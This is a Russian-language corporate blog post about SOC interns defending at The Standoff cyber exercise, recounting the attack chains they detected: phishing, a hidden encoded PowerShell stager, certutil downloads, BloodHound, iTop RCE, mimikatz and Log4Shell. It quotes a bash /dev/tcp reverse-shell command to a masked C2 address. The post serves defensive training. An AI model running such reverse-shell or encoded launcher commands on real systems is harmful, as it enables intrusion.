17.10.2022 11:52
ptsecurity 0 905 Источник

Привет, Хабр! А вот и обещанный пост с продолжением истории о стажировке начинающих ибэшников в команде SOC экспертного центра безопасности Positive Technologies (PT ESC). Как мы писали в предыдущей статье, ребятам еще не приходилось сталкиваться с реальной хакерской активностью, поэтому финальным аккордом их стажировки мы решили сделать участие в кибербитве The Standoff. Ниже мы расскажем, какой план и формат работы мы предложили подопечным на битве, разберем парочку кейсов из их отчетов и поделимся отзывами самих ребят. А еще попробуем ответить на главный вопрос: насколько реально для начинающих специалистов без практического опыта обнаружить и расследовать действия настоящих злоумышленников? 

Welcome под кат!

Участие в The Standoff

The Standoff — одна из самых масштабных открытых кибербитв в мире, где сильнейшие белые хакеры сражаются за ресурсы виртуальной страны — копии цифровой реальности современной России, а команды специалистов по информационной безопасности учатся противостоять целевым атакам на ключевые объекты собственного бизнеса.

Со временем виртуальный город, который назывался City F, вырос на макете до размеров целого государства (теперь это Государство F), демонстрируя технологические цепочки таких отраслей, как электроэнергетика, нефтяная промышленность, черная металлургия, а также банковского сектора, объектов транспорта, логистики, производства и ЖКХ. Сценарии катастроф смоделированы по мотивам реальных инцидентов — зрители и участники могут наблюдать на макете последствия самых разных атак: разлива нефти, крушения поезда или взрыва на газораспределительной станции.

На последнем The Standoff было построено Государство F с тремя отраслями — черная металлургия, электроэнергетика и нефтяная промышленность. Каждая из них имеет внутри взаимосвязанные объекты — от добычи до поставки ресурсов конечным потребителям. Также в Государстве F функционирует развитая банковская система. За водоснабжение, уличное освещение, систему видеонаблюдения и парк аттракционов отвечает управляющая компания City, а морские, железнодорожные и авиаперевозки осуществляет транспортная компания Heavy Logistics.

В целом привлечение стажеров к кибербитве в качестве blue team (команды защитников) рассматривалось нами как возможность развития следующих навыков и компетенций:

  • командная работа и взаимодействие с четким разделением ролей;

  • углубленное понимание устройства инфраструктур реальных компаний; 

  • выявление, анализ и расследование инцидентов информационной безопасности;

  • знание векторов, методов и техник атакующих.

Нашим же личным интересом было взглянуть критически на программу стажировки в контексте результатов ребят на The Standoff: оценить темы и наполнение обучающих занятий, результативность наших методов работы с подопечными. 

С учетом этих целей для нас выглядел оптимальным следующий формат:

  1. Формируем небольшие команды по 4–6 стажеров. За каждой закрепляется определенный сегмент Государства F.

  2. К каждой команде добавляем по 1–2 наставника (в их роли — новые, недавно присоединившиеся к SOC сотрудники; для них The Standoff — отличная площадка для быстрого погружения в работу).

  3. Выдаем доступы к тем же продуктам, которыми пользуются настоящие команды защитников.

  4. Определяем для команд общий пул задач, состоящий из выявления атак, формирования по ним отчетов с рекомендациями, расследования реализаций недопустимых событий (в качестве задачи со звездочкой).

  5. Создаем жюри из опытных сотрудников SOC для проверки и оценки отчетов.

Таков был наш план. Далее мы постараемся подробно рассказать о ходе всего мероприятия: проанализируем показательные кейсы из отчетов стажеров, расскажем, за что можно было зацепиться при выявлении атак, и поделимся отзывами самих ребят.

Старт киберучений

Доступы к средствам мониторинга проверены, напутствия и инструкции от наставников получены, ребята готовы с минуты на минуту включиться в происходящее на площадке. Вплоть до самого старта мы беспокоились о том, как пройдет наш эксперимент с участием стажеров в The Standoff: не растеряются ли новички под шквалом разнообразных атак красных команд, не запутаются ли в многочисленных сработках наших продуктов.

Уже в первые часы противостояния наши опасения были развеяны: стажеры уверенно фиксировали атаки красных команд на начальных этапах проникновения. В топе выявленных техник были попытки сканирования сетевых ресурсов и эксплуатации уязвимостей, детектированные PT Application Firewall, а также попытки подбора учетных данных, выявленные MaxPatrol SIEM. Кроме того, опираясь на вердикты песочницы PT Sandbox, ребята смогли в режиме реального времени зафиксировать успешные фишинговые атаки и корректно проанализировать вредоносную активность, инициируемую фишинговыми вложениями. Последовавшие после проникновения в офисы действия злоумышленников стажеры также не пропустили: в их отчетах фигурировали такие техники атакующих, как использование ПО BloodHound для внутренней разведки, выполнение обфусцированных PS-скриптов и извлечение учетных данных из памяти LSASS. Впечатляющие результаты!

Первоначальный доступ: целевой фишинг с вложением

Максим

Стажер

Подробный разбор атак на занятиях очень пригодился на The Standoff, так как я уже был знаком с цепочками проведения типовых атак на инфраструктуру. При расследовании атак мне удавалось обнаружить такие индикаторы компрометации, как применение скриптов PowerShell и загрузка подозрительных текстовых документов.

По нашим наблюдениям, даже у опытных специалистов не всегда получается оперативно выявить в сети компании фишинговую атаку и отреагировать на нее. При этом данный вектор, несомненно, остается одним из самых распространенных способов проникновения в инфраструктуру. Мы учли это при подготовке занятий в течение стажировки и в рамках практических заданий достаточно времени уделили разбору видов фишинговой активности, особенностям ВПО, обнаружению в средствах мониторинга и т. д. Вооруженные полученными знаниями, ребята зафиксировали успешную атаку в сегменте банковской системы:

Первоначальной зацепкой послужил вердикт PT Sandbox о вредоносном офисном документе cv.doc, обнаруженном в сетевом трафике: благодаря интеграции PT Sandbox и PT NAD файл был автоматически извлечен и отправлен на анализ. Стажеры установили, что обнаруженный документ был разослан в почтовых вложениях с адреса LNolan@services.stf на адрес hr@bankoff.stf.

После открытия доверчивым пользователем файла cv.doc содержащаяся в нем полезная нагрузка инициирует выполнение закодированного PowerShell-скрипта и запуск утилиты certutil. Скрипт, являющийся стейджером Metasploit, предназначен для открытия сокета и установки обратного соединения с С2 злоумышленников.

"C:\\WINDOWS\\system32\\cmd.exe\"  "/b" "/c" "start" "/b" "/min" "powershell.exe" "-nop" "-w" "hidden" "-e" "aQBA7AC..ADsA""

В свою очередь, с помощью lolbin-утилиты certutil происходит обращение к С2 для скачивания вредоносного файла, который сохраняется под именем 7zip.exe.

Так команда атакующих оказалась в доменной инфраструктуре. С одной стороны, классический и не самый изысканный пример получения первоначального доступа с помощью социальной инженерии, с другой — это отличный кейс нашим ребятам для проработки и совершенствования навыков. Нас радует, что стажерам удалось зафиксировать компрометацию, идентифицировать фишинговую рассылку и отследить техники красной команды. 

Часть описания инцидента и предложения по реагированию, предоставленные одним из стажеров
Часть описания инцидента и предложения по реагированию, предоставленные одним из стажеров
Дмитрий

Стажер

Знания, полученные на занятиях, которые для нас проводили на стажировке, были полезны при мониторинге и помогали быстрее ориентироваться при поиске следов компрометации, особенно практика по Initial Access.

Разведка с BloodHound

Разумеется, после проникновения в систему перед любым злоумышленником встает вопрос о том, как развить атаку вглубь инфраструктуры. Почти всегда он начинает с разведки — со сбора информации о домене, доменных компьютерах, пользователях и т. д. Важно, чтобы аналитики SOC умели детектировать и анализировать подобную активность: поняв, когда и к каким именно данным получил доступ атакующий, можно сделать выводы о его дальнейшем продвижении и целях. Но насколько оперативно получится у начинающих специалистов среагировать на проведение разведки?

ПО BloodHound позволяет проводить расширенную разведку внутри сети компании, собирая информацию о домене c помощью коллектора SharpHound. Работа инструмента базируется на LDAP и SMB-протоколах. В пакете экспертизы MaxPatrol SIEM есть правила для выявления использования BloodHound или SharpHound, основанные на специфичной активности, связанной с подключениями к определенным именованным каналам.

Николай

Стажер

При поиске цепочек я отталкивался от автоматически зарегистрированных инцидентов в SIEM для формирования списка узлов, на которые происходит атака. После этого просматривал события для каждого узла и при обнаружении подозрительных действий на этом узле отображал их на таймлайне инцидентов.

Зацепившись за сработки этих правил на скомпрометированном узле, наши ребята в течение часа сумели верифицировать активность и даже предложить пусть не исчерпывающие, но вполне разумные рекомендации по реагированию на инцидент.

Часть описания инцидента и предложения по реагированию, предоставленные одним из стажеров
Часть описания инцидента и предложения по реагированию, предоставленные одним из стажеров

За пределами киберполигона подобное оперативное обнаружение активной разведки могло бы помочь предотвратить дальнейшее продвижение атакующих и остановить атаку на ранней стадии.

Следующий раунд

В начале второго дня мы, воодушевленные предыдущими успехами стажеров, тем не менее понимали, что большинство зафиксированных атак были лишь начальными стадиями и активное развитие еще впереди. Хватит ли у ребят скилов и энтузиазма на разбор более сложных и продвинутых техник атакующих? 

Кроме того, к этому моменту мы уже располагали информацией о фактах реализации недопустимых событий, которую через наставников довели и до стажеров. Первоначальный план был решительный: как можно дольше не выдавать никаких подсказок, мотивируя ребят самостоятельно раскрутить всю цепочку работы атакующих, приведшую к недопустимому событию. Такой настрой оказался слишком оптимистичным... но не будем торопить события и оставим масштабное расследование на потом, а пока рассмотрим другой интересный кейс, зафиксированный нашими стажерами.

Недостатки в общедоступном приложении

Анастасия

Стажер

Наиболее сложным мне показалось нахождение точки первичного проникновения в систему. Здесь немаловажную роль сыграл PT Application Firewall, с помощью которого производился поиск проникновений через веб-приложения офиса. С помощью PT NAD мы искали цепочки компрометации узлов (с какого узла происходил взлом других узлов компании) и отображали их на топологии.

Другой способ проникновения в систему, который нельзя оставить без внимания, — эксплуатация известной уязвимости, которая по каким-то причинам не была своевременно закрыта. Достаточно открыть пару свежих APT[1]-репортов, чтобы убедиться в том, насколько часто прибегают к данному вектору злоумышленники. Поскольку инфраструктура Государства F максимально приближена к реальной жизни, данная техника пользовалась большой популярностью и у красных команд на The Standoff.

Во время стажировки мы познакомили подопечных с веб-атаками, сделав акцент на способах их детектирования в PT NAD и PT Application Firewall. Давайте посмотрим, насколько успешно у них получилось верифицировать такую активность:

Основными признаками компрометации при помощи уязвимости чаще всего служат активности вроде загрузки веб-шелла, выполнения команд через него, запуска необычных процессов пользователями вроде www-data и др. Именно за них и удалось зацепиться нашим стажерам при расследовании взлома веб-сервиса iTop в сегменте УК «Сити»: в сетевом трафике узла itop.city.stf (10.156.12[.]34) PT NAD обнаружил признаки шелла . Начав разбираться, ребята выяснили, что злоумышленники залили туда веб-шелл и начали с ним взаимодействие:

После подробного исследования нелегитимной активности в том же PT NAD и MaxPatrol SIEM удалось установить, что команда атакующих проэксплуатировала уязвимость типа Remote Code Execution в iTop, которая позволила им изменить пароль администратора iTop и получить шелл от имени пользователя www-data.

Забегая вперед, сообщим, что этот взлом iTop был частью одной из запутанных и многоступенчатых цепочек реализаций недопустимых событий, рассмотренных стажерами на The Standoff. На данном этапе злоумышленники еще не успели продвинуться вглубь инфраструктуры и добраться до SCADA-сегмента, поэтому грамотная локализация и реагирование на такую атаку позволили бы своевременно остановить атакующих, избежав наступления недопустимых событий (и в The Standoff, и в реальной жизни!).

Описание инцидента и предложения по реагированию, предоставленные одним из стажеров
Описание инцидента и предложения по реагированию, предоставленные одним из стажеров

Расследование недопустимых событий

Приведенные выше примеры убедительно доказывают: стажеры держали марку, достойно справляясь с детектированием отдельных атак красных команд. Безусловно, им не всегда удавалось верно верифицировать и проанализировать наблюдаемую активность без наводок наставников. Но не будем забывать, что ребята только начинают свой путь в ИБ и не ошибается тот, кто ничего не делает ????.

Пришло время ответить на главный вопрос: реально ли новичкам в ИБ выстроить цепочку и полноценно расследовать реализацию недопустимых событий? 

Напомним, что строгое жюри в лице опытных сотрудников нашего отдела планировало соблюсти чистоту эксперимента и дать возможность стажерам склеить цепочки атак самостоятельно. Мы честно придерживались обозначенного плана вплоть до последних дней киберучений, но под конец решили ослабить хватку: ребята упорно пытались разобраться в реализации недопустимых событий, искали начальные векторы и пути продвижения по инфраструктуре, но цельная картина ни у кого не складывалась. Объективно это закономерная ситуация, ведь для разбора подобных сложных инцидентов, сравнимых по уровню с действиями APT-группировок, необходимы опыт и навыки, а также определенная «насмотренность» по части расследований. В числе наших основных целей было дать стажерам этот самый опыт, при этом направляя и наставляя их. Поэтому мы сменили тактику, начав понемногу выдавать им подсказки вроде точного времени реализации события или конкретной техники, использованной красной командой, либо имени узла, на котором стоит поискать нелегитимную активность. И дело пошло!

В результате синергии молодых специалистов, опытных наставников и продуктов Positive Technologies к финалу The Standoff на суд жюри было представлено несколько полноценных отчетов по расследованию недопустимых событий. Формат статьи не позволит нам подробно рассмотреть каждый, поэтому мы кратко пробежимся по одному из них, осветив, как описанное событие было на самом деле реализовано и что удалось (и не удалось) увидеть нашим ребятам.

Показ нелегитимного контента на рекламных видеоэкранах 

Евгений

Стажер

При расследовании реализаций недопустимых событий зацепки сильно зависели от того, что за риск был реализован. Например, с заменой видеоконтента на рекламных экранах удалось зацепиться за видеофайлы в трафике PT NAD

Для получения первоначального доступа команда атакующих использовала фишинговую рассылку: с адреса bsimon@services.stf на адрес отдела кадров hr@city.stf было отправлено письмо с вредоносным вложением cv.doc, которое запустил доверчивый пользователь a_espinoza на узле comp-148.city.stf (10.156.14.12). Как вы уже знаете, фишинговую активность наши стажеры верифицировать умеют, и данную атаку они зафиксировали.

Из отчета команды стажеров
Из отчета команды стажеров

Далее красная команда сумела повысить привилегии до системных с помощью эксплойта Juicy Potato. Эту активность ребята в данном расследовании не зафиксировали. Справедливости ради отметим, что в рамках другого расследования аналогичную атаку с Juicy Potato они нашли.

Из отчета команды стажеров
Из отчета команды стажеров

Следующим шагом злоумышленники получают обратное соединение на свой С2 (для этого использовался Cobalt Strike: полезная нагрузка была сохранена на узле под именем artifact.exe) и делают дамп процесса lsass с помощью модуля mimikatz. В результате они получили пароль a_espinoza. Увы, данную атаку стажеры не увидели, несмотря на то что сработки на нее в наших продуктах были:

За этим последовала упомянутая ранее эксплуатация уязвимости в iTop, получение RCE. Активность была замечена, разобрана и подробно отражена в отчете ребят!

Выполнение атакующими команды bash -c bash -i >& /dev/tcp/XX.XXX.XXX.XX/7171 0>&1 для установления обратного подключения к С2. Скриншот, приложенный командой стажеров
Выполнение атакующими команды bash -c bash -i >& /dev/tcp/XX.XXX.XXX.XX/7171 0>&1 для установления обратного подключения к С2. Скриншот, приложенный командой стажеров
Часть разбора активности с iTop (из отчета команды стажеров)
Часть разбора активности с iTop (из отчета команды стажеров)

После этого злоумышленники осуществляют атаку на обнаруженный ранее узел advertising.city.stf (10.156.12.25), эксплуатируя уязвимость Log4Shell в веб-сервере Tomcat. В результате атакующие получают реверс-шелл на свой С2. Эта атака также была верифицирована нашими ребятами.

Эксплуатация Log4Shell. Скриншот, приложенный к отчету командой стажеров
Эксплуатация Log4Shell. Скриншот, приложенный к отчету командой стажеров
Из отчета команды стажеров
Из отчета команды стажеров

И, наконец, само недопустимое событие — подмена видеоролика. Злоумышленники скачивают видеофайл с удаленного ресурса и перемещают в нужную директорию. Финальный шаг был успешно расследован и описан.

Загрузка и копирование видеофайла. Скриншоты, представленные стажерами
Загрузка и копирование видеофайла. Скриншоты, представленные стажерами
Из отчета команды стажеров
Из отчета команды стажеров

Итоги The Standoff

Почти 4 дня команды стажеров провели за расследованиями многочисленных атак красных команд, направленных на отрасли Государства F. Насколько продуктивно — судите сами: суммарно они выявили 195 инцидентов информационной безопасности и предоставили 7 отчетов о расследовании реализованных недопустимых событий. Сравните с результатами команд, участвовавших в основной программе The Standoff, — суммарно 287 отчетов о выявленных защитниками инцидентах при 30 уникальных рисках, реализованных атакующими. 

Эксперимент с привлечением стажеров к The Standoff стал новой вехой и для нас самих. Он дал возможность комплексно оценить использованные нами методики работы со стажирующимися, подсветил те нюансы, на которых следует делать акценты при обучении начинающих специалистов. 

Детектирование актуальных техник атакующих в инфраструктуре, максимально приближенной к реальной, — это тот уникальный опыт, который получили наши стажеры на старте карьеры.

Безусловно, можно указать на то, что не все зафиксированные нашими продуктами атаки ребята увидели, а какие-то не заметили бы без подсказок. В некоторых случаях сказался недостаток экспертизы, где-то не хватило реального опыта выявления хакерской активности. Но мы уверены, что тот большой пул практических навыков, который приобрели стажеры на The Standoff, станет для них серьезной точкой роста, а все возникшие трудности послужат дополнительной мотивацией к дальнейшему обучению и расширению профессионального кругозора. 

Евгений

Стажер

Если обобщать, то опыт участия в The Standoff просто бесценный. Я очень рад, что мне удалось поучаствовать в настолько классном мероприятии. Думаю, что и я, и все остальные в результате прокачали свои навыки, как никогда раньше.

Максим

Стажер

The Standoff для меня — это большая возможность попрактиковаться в работе с инцидентами, которые могут быть делом рук реальных хакеров. Я, как начинающий специалист, получил от кибербитвы большое количество бесценного опыта и положительных впечатлений.

Послесловие

На сегодняшний день, в условиях многократно возросшего числа кибератак и все более ощутимого для индустрии дефицита специалистов, необходимы новые компетентные и квалифицированные SOC-кадры. Обучение и поддержка начинающих специалистов так же необходимы и важны, как и вложения в развитие продуктов и улучшение экспертизы. Мы постарались сделать стажировку максимально содержательной и продуктивной, сочетая лекции и практические задания с работой над реальными задачами в реальной инфраструктуре.

Пользуясь случаем, мы хотели бы поблагодарить всех коллег, прошедших этот путь вместе с нами: отдел образовательных программ, HR-специалистов и, конечно, весь SOC. А нашим «выпускникам» желаем успехов в их дальнейшем профессиональном росте и развитии. Фундамент заложен, и теперь им важно продолжать масштабировать свои знания, наращивать экспертизу и непрерывно совершенствоваться как специалистам.

Подводя итог, отметим, что эта стажировка стала источником ценного опыта и знаний не только для стажеров, но и для нас самих. Мы под новым углом посмотрели на организацию обучения молодых специалистов, обкатали выработанные нами методики, определили необходимые корректировки программы. Пожалуй, главным вывод для нас стало понимание того, что поддержку и развитие начинающих ИБ-специалистов необходимо сделать системным и постоянно совершенствующимся процессом. И стартовавшая 15 августа новая стажировка стала его очередным этапом!  

[1] Advanced persistent threat (APT) — хорошо организованная, тщательно спланированная кибератака, направленная на конкретную компанию или целую отрасль. В ходе нее злоумышленник получает несанкционированный доступ к сети, закрепляется в инфраструктуре и надолго остается незамеченным. За такими атаками, как правило, стоят APT-группировки, имеющие значительные финансовые ресурсы и технические возможности. Подробнее читайте здесь.

Авторы:

  • Константин Грищенко, руководитель отдела мониторинга информационной безопасности компании Positive Technologies

  • Екатерина Никулина, специалист отдела мониторинга информационной безопасности компании Positive Technologies

Комментарии (0)